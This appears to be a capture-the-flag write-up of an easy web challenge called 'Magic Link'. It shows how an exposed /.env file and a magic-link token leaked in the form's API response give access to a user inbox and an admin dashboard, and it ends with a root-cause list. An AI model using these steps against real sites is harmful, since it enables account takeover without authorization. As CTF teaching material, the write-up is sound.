← Writeups

2026-04-17 • ctf • easy • web

CTF web - Magic Link

Exposed .env and predictable magic-link token flow

webmisconfigurationmagic-link reconweb-enumeration

Introduction

Target URL:

  • https://bluehens-magic-link.chals.io

Challenge description:

  • Not provided.

Recon

The homepage is a simple Magic Link Login Service with an email input.

When submitting any email, the application returns:

Magic link generated, check your email.

As usual, I checked robots.txt for hidden paths:

URL: https://bluehens-magic-link.chals.io/robots.txt

User-agent: *
Disallow: /inbox
Disallow: /dashboard
Disallow: /.env

The /.env endpoint is exposed and reveals sensitive values:

URL: https://bluehens-magic-link.chals.io/.env

TEDDYS_EMAIL=teddy@udctf.com
TEDDYS_TOKEN=udctf{d0n7_h057_y0ur_3nv_f113}
ADMIN_EMAIL=admin@udctf.com
INBOX_URL=http://localhost:5050/inbox?token=${TEDDYS_TOKEN}

First flag:

  • udctf{d0n7_h057_y0ur_3nv_f113}

Exploitation Path

INBOX_URL shows how Teddy’s inbox is accessed:

https://bluehens-magic-link.chals.io/inbox?token=udctf{d0n7_h057_y0ur_3nv_f113}

The inbox page initially shows:

Teddy's Inbox (Refreshes every 5s)

Then I submitted Teddy’s email on the main page to generate a login link. After refresh, Teddy’s inbox contained:

Click here to login

udctf{m4g1c_l1nks_4r3_w31rd}

Second flag:

  • udctf{m4g1c_l1nks_4r3_w31rd}

The link also redirects to Teddy’s dashboard:

URL: https://bluehens-magic-link.chals.io/dashboard

Welcome Teddy

Flag:

The login URL format looked like this:

https://bluehens-magic-link.chals.io/login/gEbZQj7UvunG2QYEfsV_zw

At this point, ADMIN_EMAIL from .env became relevant. I submitted admin@udctf.com in the form and inspected the API response:

{
  "datetime": "2026-04-18T00:02:22.925782+00:00",
  "email": "admin@udctf.com",
  "ip-address": "10.1.0.20",
  "message": "Magic link generated, check your email.",
  "uuid": "xUC-uugdppPIoNzhE1v7DA"
}

The uuid matches the token format used in /login/<token>, so I used:

https://bluehens-magic-link.chals.io/login/xUC-uugdppPIoNzhE1v7DA

Result:

Welcome Admin

Flag: udctf{y0u_4r3_m4g1c_l1nk_m4st3r}

Third flag:

  • udctf{y0u_4r3_m4g1c_l1nk_m4st3r}

Root Cause

  1. Sensitive environment variables were publicly exposed via /.env.
  2. Magic-link token material (uuid) was returned directly in the form response.
  3. No additional verification prevented direct use of /login/<uuid> for admin access.